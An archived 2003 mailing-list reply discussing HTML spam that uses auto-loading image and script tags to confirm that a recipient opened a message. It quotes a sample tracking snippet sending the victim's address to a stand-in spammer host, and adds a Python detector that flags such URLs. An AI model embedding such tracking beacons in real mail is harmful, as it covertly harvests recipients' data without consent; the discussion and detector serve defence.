-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Although I don't know any specific name for this, it's really not a
new technique at all - that is why most of us (sane) people disable
inbound html emails at the client level and just show the plaintext
(html).

regards,
jamie

Calderon, Juan C (CORP, DDEMESIS) wrote:
> Hello all
> spammers, I don't know a common name or something for such a
> technique, so if you know it please let me know.
>
> PROBLEM
> well known "Remove Me" link which, in fact, will confirm user read
> the message (and probably will be bombed with many more, now that he
> said "hey!, I'm here"). However, it requires user interaction.
>
> SOLUTION
> example) or Script tag in the HTML mail, all those elements indicate
> Web browsers to send a GET request using the SRC or HREF attribute,
> without user interaction.
>
> Sample Code (Mail sent to fictitious peter@foomail.com)
> src='http://www.spamer.com/AutoRecordAddress.php?email=peter%40foomail%2Ecom'><br>
> Click <a href='http://www.spamer.com/ConfirmVictim.php'>Here</a>
> to be removed<br>
> NOTE:the presence of this link indicates this is not spamming even
> if you don't ask for this email
> </BODY>
> automatically send a request for a "image" file served by a
> Server-side script, first recording the data without explicit
> authorization.
>
> I've tested this (using 3 different tags) using Exchange and some
> other public accounts. I have succeeded in all cases.
>
> So have you seen something similar? Do you think this is a kind of
> XSS? I do.
>
> cheers :)

Jamie Pratt
Systems Administrator/Programmer Analyst
Norwich University Course Development Center
jamie@nucdc.org | ph. (802)485-2532
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (MingW32) - WinPT 0.7.94
iD8DBQE+pX0mFnM/ewGVQ7IRArOBAKCADozntexoxPiswN8+lbGP2aWXnQCdGFz5
lbp/9gWPBdFmHx+lplhCU6k=
=VxTI
-----END PGP SIGNATURE-----
Received on Tue Apr 22 13:58:08 2003
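
A defender-side check for the technique described in the quoted message, as an added example that is not part of the original thread: it lists the elements in an HTML mail body that a rendering client fetches without a click and flags URLs whose query string carries the recipient's address. The tag list, the tracker.example and cdn.example hosts and the sample body are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qsl

# Assumed (tag, attribute) pairs that an HTML-rendering mail client may
# fetch on display, with no click. <a href> is excluded: it needs a click.
AUTO_FETCH = {("img", "src"), ("script", "src"), ("iframe", "src"),
              ("embed", "src"), ("link", "href"), ("body", "background")}


class RemoteFetchFinder(HTMLParser):
    """Collects (tag, url, carries_recipient) for auto-fetched remote URLs."""

    def __init__(self, recipient):
        super().__init__()
        self.recipient = recipient.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        for name, value in attrs:
            if (tag, name) not in AUTO_FETCH or not value:
                continue
            parts = urlsplit(value)
            if parts.scheme not in ("http", "https"):
                continue  # cid:, data: and similar never leave the client
            # parse_qsl percent-decodes, so %40 and %2E still match.
            tagged = any(self.recipient in v.lower()
                         for _, v in parse_qsl(parts.query))
            self.findings.append((tag, value, tagged))


def find_auto_fetches(html, recipient):
    finder = RemoteFetchFinder(recipient)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample body; tracker.example and cdn.example are placeholders.
SAMPLE = """<HTML><BODY>
<IMG SRC='http://tracker.example/AutoRecordAddress.php?email=peter%40example%2Ecom'><br>
Click <a href='http://tracker.example/ConfirmVictim.php'>Here</a> to be removed<br>
<img src='cid:logo@local'>
<script src="https://cdn.example/x.js"></script>
</BODY></HTML>"""

if __name__ == "__main__":
    for tag, url, tagged in find_auto_fetches(SAMPLE, "peter@example.com"):
        print(f"{tag:7} recipient-tagged={tagged}  {url}")
```

A mail gateway or client plugin could run the same check before rendering and strip or proxy the flagged elements.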
This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:50 EDT